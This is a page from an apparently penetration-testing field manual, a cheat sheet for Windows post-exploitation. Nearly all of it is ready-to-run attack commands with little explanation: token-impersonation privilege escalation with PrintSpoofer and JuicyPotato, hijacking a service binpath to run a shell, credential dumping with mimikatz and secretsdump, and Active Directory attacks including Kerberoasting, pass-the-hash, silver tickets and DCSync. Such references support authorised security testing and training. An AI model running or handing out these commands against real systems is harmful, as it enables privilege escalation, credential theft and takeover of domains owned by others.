> For the complete documentation index, see [llms.txt](https://rouxtronics.gitbook.io/stemsecure/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rouxtronics.gitbook.io/stemsecure/field-manual/04-post-exploitation-windows.md).

# 04 - Post-Exploitation: Windows

## Situational Awareness

| Command                                                        | Purpose                  |
| -------------------------------------------------------------- | ------------------------ |
| `whoami /all`                                                  | User, groups, privileges |
| `net user` / `net localgroup administrators`                   | Local accounts           |
| `systeminfo`                                                   | OS, hotfixes, domain     |
| `ipconfig /all; route print`                                   | Network config           |
| `netstat -ano`                                                 | Active connections       |
| `tasklist /SVC`                                                | Running processes        |
| `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` | Autorun entries          |
| `wmic product get name,version`                                | Installed software       |

## Privilege Escalation

**Automated enum**: `winpeas.exe`, `PowerUp.ps1` (`Invoke-AllChecks`), `SharpUp.exe audit`

**Token impersonation**

```
whoami /priv     # look for SeImpersonatePrivilege
```

| Privilege                | Tool                                              |
| ------------------------ | ------------------------------------------------- |
| SeImpersonatePrivilege   | `PrintSpoofer.exe -i -c cmd` or `JuicyPotato.exe` |
| SeDebugPrivilege         | Migrate to a SYSTEM process (Meterpreter)         |
| SeTakeOwnershipPrivilege | `takeown /f C:\Windows\System32\...`              |

**Service exploits**

```
sc qc <service>
accesschk64.exe -wuvc <service>
sc config <service> binpath= "C:\temp\shell.exe"
sc start <service>
```

**Credential harvesting**

```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
mimikatz.exe "lsadump::sam" "lsadump::secrets" exit
reg save HKLM\sam sam.hive && reg save HKLM\system system.hive
secretsdump.py -sam sam.hive -system system.hive LOCAL
```

## Active Directory

**Enumeration**

```
bloodhound-python -c All -u user -p pass -ns $TARGET -d domain.local
SharpHound.exe -c All --zipfilename enum.zip
ldapsearch -x -H ldap://$TARGET -b 'DC=domain,DC=local'
```

**Kerberos attacks**

| Attack          | Command                                                                          |
| --------------- | -------------------------------------------------------------------------------- |
| Kerberoasting   | `GetUserSPNs.py domain/user:pass -dc-ip $TARGET -request`                        |
| AS-REP roasting | `GetNPUsers.py domain/ -usersfile users.txt -dc-ip $TARGET`                      |
| Pass-the-hash   | `psexec.py -hashes :NTLM domain/user@$TARGET`                                    |
| Pass-the-ticket | `export KRB5CCNAME=ticket.ccache; psexec.py -k -no-pass user@host`               |
| Silver ticket   | `ticketer.py -nthash svc_hash -domain-sid S-1-5 -domain dom -spn cifs/host user` |
| DCSync          | `secretsdump.py domain/admin@$TARGET -just-dc`                                   |
